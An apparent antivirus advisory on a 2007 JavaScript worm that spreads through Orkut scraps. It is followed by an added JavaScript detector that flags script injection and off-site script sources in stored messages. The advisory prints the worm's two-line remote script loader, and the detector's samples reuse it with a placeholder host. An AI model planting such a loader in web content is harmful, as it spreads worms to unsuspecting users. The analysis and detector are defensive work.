W32/KutWormor
- Type: Virus
- SubType: JavaScript
- Discovery Date: 12/19/2007
- Length: various
- Minimum DAT: 5191 (12/21/2007)
- Updated DAT: 5191 (12/21/2007)
- Minimum Engine: 5.1.00
- Description Added: 12/19/2007
- Description Modified: 12/19/2007 2:27 PM (PT)
Risk Assessment
- Corporate User: Low-Profiled
- Home User: Low-Profiled
Characteristics
Update, December 19, 2007: The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.pcworld.com/article/id,140653-c,worms/article.html
This virus adds the infected user to a community called "Infectados pelo Virus Orkut", which means "Infected by the Orkut Virus", and starts sending scraps (messages in Orkut's model) to the friends of the infected user.
This is done by adding a JavaScript file called virus.js to the scrap message:
script=document.createElement('script');
script.src='http://[REMOVED]/virusdoorkut/[REMOVED]/virus.js';
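A defender-side check for the loader pattern shown above, as an added example that is not the vendor's detection logic: it inspects stored scrap bodies for script-execution markup and for `src` values pointing at off-site script. `TRUSTED_HOSTS`, the rule names and the sample scraps (including the `example.invalid` host standing in for the redacted one) are constructed for illustration.

```javascript
// Added example, not vendor code. TRUSTED_HOSTS and SAMPLES are constructed.
const TRUSTED_HOSTS = new Set(['www.orkut.com']); // assumed first-party host

// Markup or code in a stored scrap that can lead to script execution.
const RULES = [
  { id: 'script-tag', re: /<\s*script\b/i },
  { id: 'dynamic-script-element', re: /createElement\s*\(\s*['"]script['"]\s*\)/i },
  { id: 'inline-event-handler', re: /<[^>]+\son\w+\s*=/i },
  { id: 'javascript-url', re: /javascript\s*:/i },
];

// Every URL assigned to a src attribute or a .src property.
function srcUrls(body) {
  const re = /\bsrc\s*=\s*['"]?([^'"\s>;]+)/gi;
  return Array.from(body.matchAll(re), m => m[1]);
}

// Hostname of an absolute or protocol-relative URL; null for relative paths.
function hostOf(url) {
  const abs = url.startsWith('//') ? 'http:' + url : url;
  try { return new URL(abs).hostname.toLowerCase(); } catch (e) { return null; }
}

function inspectScrap(body) {
  const findings = RULES.filter(r => r.re.test(body)).map(r => r.id);
  const scripted = findings.length > 0;
  // An off-site src matters when script is present or the target is a .js file.
  const offsite = srcUrls(body).filter(u => {
    const h = hostOf(u);
    return h !== null && !TRUSTED_HOSTS.has(h) &&
           (scripted || /\.js([?#]|$)/i.test(u));
  }).map(hostOf);
  if (offsite.length > 0) findings.push('offsite-script-src:' + offsite.join(','));
  return { quarantine: findings.length > 0, findings };
}

// Constructed scrap bodies; the loader reuses the page's two lines with a
// placeholder host in place of the redacted one.
const SAMPLES = {
  greeting: 'Boas Festas de final de Ano!',
  image: '<img src="http://pics.example.invalid/a.gif"> 2008 vem ai...',
  loader: "script=document.createElement('script');" +
          "script.src='http://files.example.invalid/virusdoorkut/virus.js';",
};

for (const [name, body] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(inspectScrap(body)));
}
```

Pattern matching of this kind is a triage aid for content already stored; the durable control is encoding scrap content on output and restricting which origins may serve script to the page.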
Symptoms
The infected user will start to send scraps (messages in Orkut's model) to his friends. The scrap will arrive by email to the friend with some Portuguese messages like: "2008 vem ai... que ele comece mto bem para vc", which means "2008 is arriving, I hope that it starts quite well for you", or "Boas Festas de final de Ano!", which means "Have a nice new years party!".
Once the user receives the email and checks the scrap, the message will contain a JavaScript file, called virus.js, which will execute, start the scrap-sending process and add the infected user to the "Infectados pelo Virus Orkut" community.
This is specifically targeted at Brazilian users, the majority of the users of the Google social network, but other users may be affected by checking these scraps.
Method of Infection
The basic method of infection is:
- the user receives an email telling them that they got a new scrap...
- the user checks Orkut's scrapbook...
- just by checking the scrapbook they become infected, since the message has a link to a remote malicious .js file (virus.js).
Removal
A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.
Variants
N/A
Overview
This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.
This virus will affect users of the social network Orkut.